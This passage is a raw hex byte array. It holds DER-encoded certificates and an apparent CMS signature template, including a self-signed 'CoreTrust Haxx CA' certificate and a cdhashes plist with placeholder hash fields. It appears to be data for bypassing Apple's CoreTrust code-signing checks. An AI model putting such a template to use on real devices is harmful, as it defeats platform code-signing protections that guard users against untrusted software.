0xc9, 0x19, 0x72, 0xf5, 0x5d, 0x0e, 0xd5, 0x7f, 0x5f, 0x9b, 0xf2, 0x25,
0x03, 0xba, 0x55, 0x8f, 0x4d, 0x5d, 0x0d, 0xf1, 0x64, 0x35, 0x23, 0x15,
0x4b, 0x15, 0x59, 0x1d, 0xb3, 0x94, 0xf7, 0xf6, 0x9c, 0x9e, 0xcf, 0x50,
0xba, 0xc1, 0x58, 0x50, 0x67, 0x8f, 0x08, 0xb4, 0x20, 0xf7, 0xcb, 0xac,
0x2c, 0x20, 0x6f, 0x70, 0xb6, 0x3f, 0x01, 0x30, 0x8c, 0xb7, 0x43, 0xcf,
0x0f, 0x9d, 0x3d, 0xf3, 0x2b, 0x49, 0x28, 0x1a, 0xc8, 0xfe, 0xce, 0xb5,
0xb9, 0x0e, 0xd9, 0x5e, 0x1c, 0xd6, 0xcb, 0x3d, 0xb5, 0x3a, 0xad, 0xf4,
0x0f, 0x0e, 0x00, 0x92, 0x0b, 0xb1, 0x21, 0x16, 0x2e, 0x74, 0xd5, 0x3c,
0x0d, 0xdb, 0x62, 0x16, 0xab, 0xa3, 0x71, 0x92, 0x47, 0x53, 0x55, 0xc1,
0xaf, 0x2f, 0x41, 0xb3, 0xf8, 0xfb, 0xe3, 0x70, 0xcd, 0xe6, 0xa3, 0x4c,
0x45, 0x7e, 0x1f, 0x4c, 0x6b, 0x50, 0x96, 0x41, 0x89, 0xc4, 0x74, 0x62,
0x0b, 0x10, 0x83, 0x41, 0x87, 0x33, 0x8a, 0x81, 0xb1, 0x30, 0x58, 0xec,
0x5a, 0x04, 0x32, 0x8c, 0x68, 0xb3, 0x8f, 0x1d, 0xde, 0x65, 0x73, 0xff,
0x67, 0x5e, 0x65, 0xbc, 0x49, 0xd8, 0x76, 0x9f, 0x33, 0x14, 0x65, 0xa1,
0x77, 0x94, 0xc9, 0x2d, 0x02, 0x03, 0x01, 0x00, 0x01, 0xa3, 0x82, 0x01,
0x7a, 0x30, 0x82, 0x01, 0x76, 0x30, 0x0e, 0x06, 0x03, 0x55, 0x1d, 0x0f,
0x01, 0x01, 0xff, 0x04, 0x04, 0x03, 0x02, 0x01, 0x06, 0x30, 0x0f, 0x06,
0x03, 0x55, 0x1d, 0x13, 0x01, 0x01, 0xff, 0x04, 0x05, 0x30, 0x03, 0x01,
0x01, 0xff, 0x30, 0x1d, 0x06, 0x03, 0x55, 0x1d, 0x0e, 0x04, 0x16, 0x04,
0x14, 0x2b, 0xd0, 0x69, 0x47, 0x94, 0x76, 0x09, 0xfe, 0xf4, 0x6b, 0x8d,
0x2e, 0x40, 0xa6, 0xf7, 0x47, 0x4d, 0x7f, 0x08, 0x5e, 0x30, 0x1f, 0x06,
0x03, 0x55, 0x1d, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0x2b, 0xd0,
0x69, 0x47, 0x94, 0x76, 0x09, 0xfe, 0xf4, 0x6b, 0x8d, 0x2e, 0x40, 0xa6,
0xf7, 0x47, 0x4d, 0x7f, 0x08, 0x5e, 0x30, 0x82, 0x01, 0x11, 0x06, 0x03,
0x55, 0x1d, 0x20, 0x04, 0x82, 0x01, 0x08, 0x30, 0x82, 0x01, 0x04, 0x30,
0x82, 0x01, 0x00, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x63, 0x64,
0x05, 0x01, 0x30, 0x81, 0xf2, 0x30, 0x2a, 0x06, 0x08, 0x2b, 0x06, 0x01,
0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x1e, 0x68, 0x74, 0x74, 0x70, 0x73,
0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65,
0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x61, 0x70, 0x70, 0x6c, 0x65, 0x63, 0x61,
0x2f, 0x30, 0x81, 0xc3, 0x06, 0x08, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x07,
0x02, 0x02, 0x30, 0x81, 0xb6, 0x1a, 0x81, 0xb3, 0x52, 0x65, 0x6c, 0x69,
0x61, 0x6e, 0x63, 0x65, 0x20, 0x6f, 0x6e, 0x20, 0x74, 0x68, 0x69, 0x73,
0x20, 0x63, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65,
0x20, 0x62, 0x79, 0x20, 0x61, 0x6e, 0x79, 0x20, 0x70, 0x61, 0x72, 0x74,
0x79, 0x20, 0x61, 0x73, 0x73, 0x75, 0x6d, 0x65, 0x73, 0x20, 0x61, 0x63,
0x63, 0x65, 0x70, 0x74, 0x61, 0x6e, 0x63, 0x65, 0x20, 0x6f, 0x66, 0x20,
0x74, 0x68, 0x65, 0x20, 0x74, 0x68, 0x65, 0x6e, 0x20, 0x61, 0x70, 0x70,
0x6c, 0x69, 0x63, 0x61, 0x62, 0x6c, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6e,
0x64, 0x61, 0x72, 0x64, 0x20, 0x74, 0x65, 0x72, 0x6d, 0x73, 0x20, 0x61,
0x6e, 0x64, 0x20, 0x63, 0x6f, 0x6e, 0x64, 0x69, 0x74, 0x69, 0x6f, 0x6e,
0x73, 0x20, 0x6f, 0x66, 0x20, 0x75, 0x73, 0x65, 0x2c, 0x20, 0x63, 0x65,
0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65, 0x20, 0x70, 0x6f,
0x6c, 0x69, 0x63, 0x79, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x63, 0x65, 0x72,
0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x70,
0x72, 0x61, 0x63, 0x74, 0x69, 0x63, 0x65, 0x20, 0x73, 0x74, 0x61, 0x74,
0x65, 0x6d, 0x65, 0x6e, 0x74, 0x73, 0x2e, 0x30, 0x0d, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x82,
0x01, 0x01, 0x00, 0x5c, 0x36, 0x99, 0x4c, 0x2d, 0x78, 0xb7, 0xed, 0x8c,
0x9b, 0xdc, 0xf3, 0x77, 0x9b, 0xf2, 0x76, 0xd2, 0x77, 0x30, 0x4f, 0xc1,
0x1f, 0x85, 0x83, 0x85, 0x1b, 0x99, 0x3d, 0x47, 0x37, 0xf2, 0xa9, 0x9b,
0x40, 0x8e, 0x2c, 0xd4, 0xb1, 0x90, 0x12, 0xd8, 0xbe, 0xf4, 0x73, 0x9b,
0xee, 0xd2, 0x64, 0x0f, 0xcb, 0x79, 0x4f, 0x34, 0xd8, 0xa2, 0x3e, 0xf9,
0x78, 0xff, 0x6b, 0xc8, 0x07, 0xec, 0x7d, 0x39, 0x83, 0x8b, 0x53, 0x20,
0xd3, 0x38, 0xc4, 0xb1, 0xbf, 0x9a, 0x4f, 0x0a, 0x6b, 0xff, 0x2b, 0xfc,
0x59, 0xa7, 0x05, 0x09, 0x7c, 0x17, 0x40, 0x56, 0x11, 0x1e, 0x74, 0xd3,
0xb7, 0x8b, 0x23, 0x3b, 0x47, 0xa3, 0xd5, 0x6f, 0x24, 0xe2, 0xeb, 0xd1,
0xb7, 0x70, 0xdf, 0x0f, 0x45, 0xe1, 0x27, 0xca, 0xf1, 0x6d, 0x78, 0xed,
0xe7, 0xb5, 0x17, 0x17, 0xa8, 0xdc, 0x7e, 0x22, 0x35, 0xca, 0x25, 0xd5,
0xd9, 0x0f, 0xd6, 0x6b, 0xd4, 0xa2, 0x24, 0x23, 0x11, 0xf7, 0xa1, 0xac,
0x8f, 0x73, 0x81, 0x60, 0xc6, 0x1b, 0x5b, 0x09, 0x2f, 0x92, 0xb2, 0xf8,
0x44, 0x48, 0xf0, 0x60, 0x38, 0x9e, 0x15, 0xf5, 0x3d, 0x26, 0x67, 0x20,
0x8a, 0x33, 0x6a, 0xf7, 0x0d, 0x82, 0xcf, 0xde, 0xeb, 0xa3, 0x2f, 0xf9,
0x53, 0x6a, 0x5b, 0x64, 0xc0, 0x63, 0x33, 0x77, 0xf7, 0x3a, 0x07, 0x2c,
0x56, 0xeb, 0xda, 0x0f, 0x21, 0x0e, 0xda, 0xba, 0x73, 0x19, 0x4f, 0xb5,
0xd9, 0x36, 0x7f, 0xc1, 0x87, 0x55, 0xd9, 0xa7, 0x99, 0xb9, 0x32, 0x42,
0xfb, 0xd8, 0xd5, 0x71, 0x9e, 0x7e, 0xa1, 0x52, 0xb7, 0x1b, 0xbd, 0x93,
0x42, 0x24, 0x12, 0x2a, 0xc7, 0x0f, 0x1d, 0xb6, 0x4d, 0x9c, 0x5e, 0x63,
0xc8, 0x4b, 0x80, 0x17, 0x50, 0xaa, 0x8a, 0xd5, 0xda, 0xe4, 0xfc, 0xd0,
0x09, 0x07, 0x37, 0xb0, 0x75, 0x75, 0x21, 0x30, 0x82, 0x04, 0x86, 0x30,
0x82, 0x03, 0x6e, 0xa0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x14, 0x51, 0x7c,
0xd0, 0xfb, 0x0b, 0x34, 0xd6, 0x40, 0xfb, 0x4d, 0xc2, 0xc7, 0x9b, 0xb2,
0xa2, 0x5f, 0x55, 0x62, 0x09, 0xe8, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x30, 0x81, 0xaf,
0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55,
0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x0c, 0x0a,
0x43, 0x61, 0x6c, 0x69, 0x66, 0x6f, 0x72, 0x6e, 0x69, 0x61, 0x31, 0x12,
0x30, 0x10, 0x06, 0x03, 0x55, 0x04, 0x07, 0x0c, 0x09, 0x43, 0x75, 0x70,
0x65, 0x72, 0x74, 0x69, 0x6e, 0x6f, 0x31, 0x1b, 0x30, 0x19, 0x06, 0x03,
0x55, 0x04, 0x0a, 0x0c, 0x12, 0x43, 0x6f, 0x72, 0x65, 0x54, 0x72, 0x75,
0x73, 0x74, 0x20, 0x48, 0x61, 0x78, 0x78, 0x20, 0x4c, 0x74, 0x64, 0x31,
0x1e, 0x30, 0x1c, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x0c, 0x15, 0x43, 0x65,
0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65, 0x20, 0x41, 0x75,
0x74, 0x68, 0x6f, 0x72, 0x69, 0x74, 0x79, 0x31, 0x1a, 0x30, 0x18, 0x06,
0x03, 0x55, 0x04, 0x03, 0x0c, 0x11, 0x43, 0x6f, 0x72, 0x65, 0x54, 0x72,
0x75, 0x73, 0x74, 0x20, 0x48, 0x61, 0x78, 0x78, 0x20, 0x43, 0x41, 0x31,
0x1e, 0x30, 0x1c, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01,
0x09, 0x01, 0x16, 0x0f, 0x68, 0x61, 0x78, 0x78, 0x40, 0x63, 0x6f, 0x72,
0x65, 0x2e, 0x74, 0x72, 0x75, 0x73, 0x74, 0x30, 0x1e, 0x17, 0x0d, 0x32,
0x33, 0x30, 0x39, 0x33, 0x30, 0x31, 0x35, 0x35, 0x34, 0x31, 0x31, 0x5a,
0x17, 0x0d, 0x33, 0x33, 0x30, 0x39, 0x32, 0x37, 0x31, 0x35, 0x35, 0x34,
0x31, 0x31, 0x5a, 0x30, 0x81, 0xaf, 0x31, 0x0b, 0x30, 0x09, 0x06, 0x03,
0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06,
0x03, 0x55, 0x04, 0x08, 0x0c, 0x0a, 0x43, 0x61, 0x6c, 0x69, 0x66, 0x6f,
0x72, 0x6e, 0x69, 0x61, 0x31, 0x12, 0x30, 0x10, 0x06, 0x03, 0x55, 0x04,
0x07, 0x0c, 0x09, 0x43, 0x75, 0x70, 0x65, 0x72, 0x74, 0x69, 0x6e, 0x6f,
0x31, 0x1b, 0x30, 0x19, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x12, 0x43,
0x6f, 0x72, 0x65, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x48, 0x61, 0x78,
0x78, 0x20, 0x4c, 0x74, 0x64, 0x31, 0x1e, 0x30, 0x1c, 0x06, 0x03, 0x55,
0x04, 0x0b, 0x0c, 0x15, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63,
0x61, 0x74, 0x65, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6f, 0x72, 0x69, 0x74,
0x79, 0x31, 0x1a, 0x30, 0x18, 0x06, 0x03, 0x55, 0x04, 0x03, 0x0c, 0x11,
0x43, 0x6f, 0x72, 0x65, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x48, 0x61,
0x78, 0x78, 0x20, 0x43, 0x41, 0x31, 0x1e, 0x30, 0x1c, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09, 0x01, 0x16, 0x0f, 0x68, 0x61,
0x78, 0x78, 0x40, 0x63, 0x6f, 0x72, 0x65, 0x2e, 0x74, 0x72, 0x75, 0x73,
0x74, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48,
0x86, 0xf7, 0x0d, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0f,
0x00, 0x30, 0x82, 0x01, 0x0a, 0x02, 0x82, 0x01, 0x01, 0x00, 0xb1, 0xac,
0x54, 0xf6, 0x67, 0xf6, 0x75, 0x1a, 0xfd, 0x94, 0x09, 0x74, 0xbf, 0x6d,
0xa6, 0xa5, 0x59, 0xc4, 0x5b, 0x30, 0x2f, 0x62, 0x21, 0xb2, 0xa3, 0xcd,
0x0c, 0xe0, 0x02, 0xba, 0x60, 0x53, 0xe5, 0x74, 0x05, 0xd5, 0xf4, 0x1f,
0x61, 0xe7, 0x55, 0x16, 0x84, 0xdd, 0xec, 0xcb, 0xce, 0xba, 0x58, 0x2f,
0x07, 0xa7, 0xd7, 0x27, 0xfd, 0x64, 0xea, 0xac, 0xc3, 0xe7, 0xa0, 0x63,
0x86, 0x53, 0x3e, 0xdc, 0x0f, 0xf4, 0xc9, 0xa9, 0x94, 0xb0, 0xae, 0xa1,
0x80, 0x22, 0xa2, 0x5a, 0xe2, 0xc3, 0x5d, 0x9c, 0xa6, 0x40, 0xe5, 0x6e,
0x95, 0x09, 0x6a, 0x1f, 0x18, 0xd5, 0x58, 0x04, 0xee, 0x32, 0x46, 0x75,
0xa6, 0x6f, 0x1c, 0x73, 0xbb, 0xa8, 0x37, 0x4f, 0xf0, 0x74, 0xcf, 0x15,
0xee, 0x87, 0xa8, 0xfb, 0x82, 0xed, 0x98, 0xcf, 0xf4, 0xd9, 0xc4, 0x74,
0xf5, 0x4b, 0x1f, 0x42, 0xa6, 0x97, 0xf4, 0xdd, 0x22, 0xae, 0x1a, 0xab,
0x8d, 0x2c, 0x3b, 0x1b, 0xb6, 0x57, 0xaa, 0xf1, 0x2e, 0x1c, 0xc3, 0xad,
0x15, 0x6f, 0xe4, 0xa0, 0xb3, 0x2c, 0x20, 0xcb, 0x19, 0xde, 0x90, 0xae,
0x53, 0xa1, 0x43, 0x7c, 0x22, 0x87, 0x2f, 0x93, 0xfa, 0x23, 0x21, 0x26,
0xeb, 0xd3, 0x00, 0x54, 0x24, 0xae, 0x27, 0xf1, 0xdf, 0x88, 0x0f, 0x75,
0xa8, 0xe1, 0x02, 0x42, 0x14, 0x57, 0xa2, 0x18, 0x4f, 0xa1, 0xd3, 0xdc,
0x91, 0x9d, 0x5a, 0xa8, 0x7d, 0x4a, 0xad, 0x83, 0x4e, 0xcc, 0xae, 0xaf,
0xa9, 0x99, 0xae, 0xed, 0xec, 0xda, 0x9d, 0xb1, 0xfb, 0x57, 0xb2, 0x59,
0xc7, 0x20, 0x03, 0xde, 0x16, 0x5f, 0xf0, 0x16, 0xf2, 0xbe, 0xd5, 0xe8,
0x64, 0x0d, 0x2b, 0x1b, 0x9a, 0xf2, 0x8f, 0x6e, 0xb6, 0x24, 0x0b, 0xd3,
0x1c, 0x95, 0xef, 0x2b, 0x7f, 0xd2, 0xb8, 0x81, 0x81, 0x07, 0x56, 0xab,
0x07, 0xb9, 0x02, 0x03, 0x01, 0x00, 0x01, 0xa3, 0x81, 0x97, 0x30, 0x81,
0x94, 0x30, 0x0f, 0x06, 0x03, 0x55, 0x1d, 0x13, 0x01, 0x01, 0xff, 0x04,
0x05, 0x30, 0x03, 0x01, 0x01, 0xff, 0x30, 0x0e, 0x06, 0x03, 0x55, 0x1d,
0x0f, 0x01, 0x01, 0xff, 0x04, 0x04, 0x03, 0x02, 0x02, 0x84, 0x30, 0x13,
0x06, 0x03, 0x55, 0x1d, 0x25, 0x04, 0x0c, 0x30, 0x0a, 0x06, 0x08, 0x2b,
0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x12, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x06, 0x16, 0x01, 0x01, 0xff, 0x04,
0x02, 0x05, 0x00, 0x30, 0x13, 0x06, 0x0a, 0x2a, 0x86, 0x48, 0x86, 0xf7,
0x63, 0x64, 0x06, 0x01, 0x03, 0x01, 0x01, 0xff, 0x04, 0x02, 0x05, 0x00,
0x30, 0x14, 0x06, 0x0b, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x06,
0x01, 0x19, 0x01, 0x01, 0x01, 0xff, 0x04, 0x02, 0x05, 0x00, 0x30, 0x1d,
0x06, 0x03, 0x55, 0x1d, 0x0e, 0x04, 0x16, 0x04, 0x14, 0xa5, 0x29, 0x0b,
0x50, 0x08, 0xd6, 0xd6, 0xa1, 0x0f, 0x41, 0xdb, 0xe1, 0x9d, 0xb2, 0x76,
0x5b, 0x00, 0x33, 0x14, 0x81, 0x30, 0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48,
0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01,
0x00, 0xa0, 0xaf, 0x51, 0x7f, 0x1b, 0xe7, 0xdf, 0x2e, 0x8d, 0x48, 0xd0,
0xfa, 0x99, 0x6e, 0x0e, 0xd2, 0x81, 0xb7, 0x75, 0x27, 0x61, 0x2e, 0x2a,
0x86, 0x6a, 0x97, 0x14, 0xa5, 0xfb, 0xe2, 0xe9, 0x75, 0x33, 0x99, 0xa6,
0x6c, 0x05, 0xfc, 0xcf, 0x7c, 0x2e, 0x9a, 0x1a, 0x2f, 0xc6, 0x60, 0xfe,
0x87, 0x22, 0x85, 0x33, 0xcf, 0x37, 0xf2, 0x13, 0xd9, 0x37, 0x3d, 0x47,
0x2a, 0x23, 0x36, 0xac, 0xcd, 0x8b, 0xb3, 0x1e, 0xec, 0xc1, 0x0e, 0x68,
0x01, 0x87, 0xf3, 0x7f, 0x53, 0xbb, 0x48, 0x6a, 0x48, 0x59, 0xd1, 0x9d,
0x5a, 0xb4, 0xa7, 0xc4, 0x3f, 0xbf, 0x59, 0xd5, 0x12, 0x02, 0x72, 0xad,
0xda, 0x4a, 0x24, 0x63, 0x6a, 0x9e, 0x0c, 0xe4, 0x63, 0xf5, 0x8e, 0x7d,
0x41, 0x62, 0x34, 0x5f, 0x3d, 0xed, 0x77, 0x13, 0xee, 0x3b, 0xb9, 0xa4,
0x9c, 0xf5, 0x77, 0x52, 0x12, 0x7d, 0x73, 0x74, 0xfd, 0xe9, 0xb6, 0x3a,
0x97, 0x36, 0x1e, 0xe9, 0x4a, 0xba, 0x37, 0xcf, 0x4a, 0x43, 0x27, 0x91,
0x4b, 0x3a, 0x63, 0x38, 0xf7, 0x4f, 0xe3, 0x99, 0x9e, 0x8a, 0x39, 0x5e,
0x2a, 0xe6, 0x43, 0x01, 0xe8, 0x75, 0xdb, 0xea, 0x29, 0x81, 0x3c, 0x54,
0x63, 0xba, 0xaf, 0x30, 0x9e, 0x29, 0xd5, 0x18, 0x85, 0xd6, 0xd3, 0xeb,
0xf6, 0x1c, 0x06, 0xc9, 0xd5, 0x7c, 0x41, 0x06, 0x18, 0x89, 0x40, 0xe8,
0xa6, 0xa0, 0xca, 0xea, 0x60, 0xc2, 0x80, 0xb0, 0x4d, 0x66, 0x5b, 0x85,
0x4e, 0x57, 0x84, 0x9e, 0x11, 0x8b, 0x52, 0x1e, 0xb5, 0x76, 0x79, 0x86,
0x32, 0x6f, 0x25, 0xf6, 0xc9, 0x96, 0xf8, 0x9d, 0xdd, 0x70, 0xdb, 0x45,
0x7c, 0xb1, 0xb1, 0x05, 0x85, 0xf9, 0xa7, 0x24, 0xdd, 0x79, 0x3b, 0xde,
0xf2, 0x4b, 0x19, 0xc0, 0x75, 0x2d, 0x82, 0x68, 0x54, 0x90, 0x42, 0x4e,
0x48, 0x30, 0x24, 0x19, 0x71, 0x31, 0x82, 0x07, 0xd2, 0x30, 0x82, 0x04,
0x19, 0x02, 0x01, 0x01, 0x30, 0x81, 0xc8, 0x30, 0x81, 0xaf, 0x31, 0x0b,
0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31,
0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x0c, 0x0a, 0x43, 0x61,
0x6c, 0x69, 0x66, 0x6f, 0x72, 0x6e, 0x69, 0x61, 0x31, 0x12, 0x30, 0x10,
0x06, 0x03, 0x55, 0x04, 0x07, 0x0c, 0x09, 0x43, 0x75, 0x70, 0x65, 0x72,
0x74, 0x69, 0x6e, 0x6f, 0x31, 0x1b, 0x30, 0x19, 0x06, 0x03, 0x55, 0x04,
0x0a, 0x0c, 0x12, 0x43, 0x6f, 0x72, 0x65, 0x54, 0x72, 0x75, 0x73, 0x74,
0x20, 0x48, 0x61, 0x78, 0x78, 0x20, 0x4c, 0x74, 0x64, 0x31, 0x1e, 0x30,
0x1c, 0x06, 0x03, 0x55, 0x04, 0x0b, 0x0c, 0x15, 0x43, 0x65, 0x72, 0x74,
0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65, 0x20, 0x41, 0x75, 0x74, 0x68,
0x6f, 0x72, 0x69, 0x74, 0x79, 0x31, 0x1a, 0x30, 0x18, 0x06, 0x03, 0x55,
0x04, 0x03, 0x0c, 0x11, 0x43, 0x6f, 0x72, 0x65, 0x54, 0x72, 0x75, 0x73,
0x74, 0x20, 0x48, 0x61, 0x78, 0x78, 0x20, 0x43, 0x41, 0x31, 0x1e, 0x30,
0x1c, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09, 0x01,
0x16, 0x0f, 0x68, 0x61, 0x78, 0x78, 0x40, 0x63, 0x6f, 0x72, 0x65, 0x2e,
0x74, 0x72, 0x75, 0x73, 0x74, 0x02, 0x14, 0x51, 0x7c, 0xd0, 0xfb, 0x0b,
0x34, 0xd6, 0x40, 0xfb, 0x4d, 0xc2, 0xc7, 0x9b, 0xb2, 0xa2, 0x5f, 0x55,
0x62, 0x09, 0xe8, 0x30, 0x0d, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65,
0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0xa0, 0x82, 0x02, 0x25, 0x30, 0x18,
0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09, 0x03, 0x31,
0x0b, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x07, 0x01,
0x30, 0x1c, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09,
0x05, 0x31, 0x0f, 0x17, 0x0d, 0x32, 0x33, 0x31, 0x31, 0x31, 0x33, 0x31,
0x38, 0x31, 0x31, 0x35, 0x39, 0x5a, 0x30, 0x2f, 0x06, 0x09, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x0d, 0x01, 0x09, 0x04, 0x31, 0x22, 0x04, 0x20, 0xc2,
0x96, 0x8f, 0x4a, 0x63, 0xc0, 0xcf, 0xb6, 0xcd, 0x82, 0xb8, 0x48, 0xe2,
0x04, 0x3d, 0xa0, 0x71, 0xfe, 0xa3, 0x66, 0x32, 0x8c, 0xb4, 0xe0, 0x94,
0x12, 0xdb, 0xb5, 0x73, 0x96, 0xc4, 0xc4, 0x30, 0x5b, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x63, 0x64, 0x09, 0x02, 0x31, 0x4e, 0x30, 0x1d,
0x06, 0x05, 0x2b, 0x0e, 0x03, 0x02, 0x1a, 0x04, 0x14, 0x51, 0xf9, 0xbc,
0xa2, 0x95, 0xbe, 0x9c, 0x2e, 0x1d, 0xee, 0x77, 0xd0, 0x93, 0xce, 0x0f,
0xcf, 0x3f, 0xc9, 0x34, 0x50, 0x30, 0x2d, 0x06, 0x09, 0x60, 0x86, 0x48,
0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x04, 0x20, 0x48, 0x41, 0x53, 0x48,
0x48, 0x41, 0x53, 0x48, 0x48, 0x41, 0x53, 0x48, 0x48, 0x41, 0x53, 0x48,
0x48, 0x41, 0x53, 0x48, 0x48, 0x41, 0x53, 0x48, 0x48, 0x41, 0x53, 0x48,
0x48, 0x41, 0x53, 0x48, 0x30, 0x82, 0x01, 0x5b, 0x06, 0x09, 0x2a, 0x86,
0x48, 0x86, 0xf7, 0x63, 0x64, 0x09, 0x01, 0x31, 0x82, 0x01, 0x4c, 0x04,
0x82, 0x01, 0x48, 0x3c, 0x3f, 0x78, 0x6d, 0x6c, 0x20, 0x76, 0x65, 0x72,
0x73, 0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x20, 0x65,
0x6e, 0x63, 0x6f, 0x64, 0x69, 0x6e, 0x67, 0x3d, 0x22, 0x55, 0x54, 0x46,
0x2d, 0x38, 0x22, 0x3f, 0x3e, 0x0a, 0x3c, 0x21, 0x44, 0x4f, 0x43, 0x54,
0x59, 0x50, 0x45, 0x20, 0x70, 0x6c, 0x69, 0x73, 0x74, 0x20, 0x50, 0x55,
0x42, 0x4c, 0x49, 0x43, 0x20, 0x22, 0x2d, 0x2f, 0x2f, 0x41, 0x70, 0x70,
0x6c, 0x65, 0x2f, 0x2f, 0x44, 0x54, 0x44, 0x20, 0x50, 0x4c, 0x49, 0x53,
0x54, 0x20, 0x31, 0x2e, 0x30, 0x2f, 0x2f, 0x45, 0x4e, 0x22, 0x20, 0x22,
0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x61,
0x70, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x44, 0x54, 0x44,
0x73, 0x2f, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x4c, 0x69,
0x73, 0x74, 0x2d, 0x31, 0x2e, 0x30, 0x2e, 0x64, 0x74, 0x64, 0x22, 0x3e,
0x0a, 0x3c, 0x70, 0x6c, 0x69, 0x73, 0x74, 0x20, 0x76, 0x65, 0x72, 0x73,
0x69, 0x6f, 0x6e, 0x3d, 0x22, 0x31, 0x2e, 0x30, 0x22, 0x3e, 0x0a, 0x3c,
0x64, 0x69, 0x63, 0x74, 0x3e, 0x0a, 0x09, 0x3c, 0x6b, 0x65, 0x79, 0x3e,
0x63, 0x64, 0x68, 0x61, 0x73, 0x68, 0x65, 0x73, 0x3c, 0x2f, 0x6b, 0x65,
0x79, 0x3e, 0x0a, 0x09, 0x3c, 0x61, 0x72, 0x72, 0x61, 0x79, 0x3e, 0x0a,
0x09, 0x09, 0x3c, 0x64, 0x61, 0x74, 0x61, 0x3e, 0x0a, 0x09, 0x09, 0x55,
0x66, 0x6d, 0x38, 0x6f, 0x70, 0x57, 0x2b, 0x6e, 0x43, 0x34, 0x64, 0x37,
0x6e, 0x66, 0x51, 0x6b, 0x38, 0x34, 0x50, 0x7a, 0x7a, 0x2f, 0x4a, 0x4e,
0x46, 0x41, 0x3d, 0x0a, 0x09, 0x09, 0x3c, 0x2f, 0x64, 0x61, 0x74, 0x61,
0x3e, 0x0a, 0x09, 0x09, 0x3c, 0x64, 0x61, 0x74, 0x61, 0x3e, 0x0a, 0x09,
0x09, 0x42, 0x41, 0x53, 0x45, 0x42, 0x41, 0x53, 0x45, 0x42, 0x41, 0x53,
0x45, 0x42, 0x41, 0x53, 0x45, 0x42, 0x41, 0x53, 0x45, 0x42, 0x41, 0x53,
0x45, 0x42, 0x41, 0x53, 0x45, 0x64, 0x09, 0x09, 0x3c, 0x2f, 0x64, 0x61,
0x74, 0x61, 0x3e, 0x0a, 0x09, 0x3c, 0x2f, 0x61, 0x72, 0x72, 0x61, 0x79,
0x3e, 0x0a, 0x3c, 0x2f, 0x64, 0x69, 0x63, 0x74, 0x3e, 0x0a, 0x3c, 0x2f,
0x70, 0x6c, 0x69, 0x73, 0x74, 0x3e, 0x0a, 0x30, 0x0d, 0x06, 0x09, 0x2a,
0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x04, 0x82,
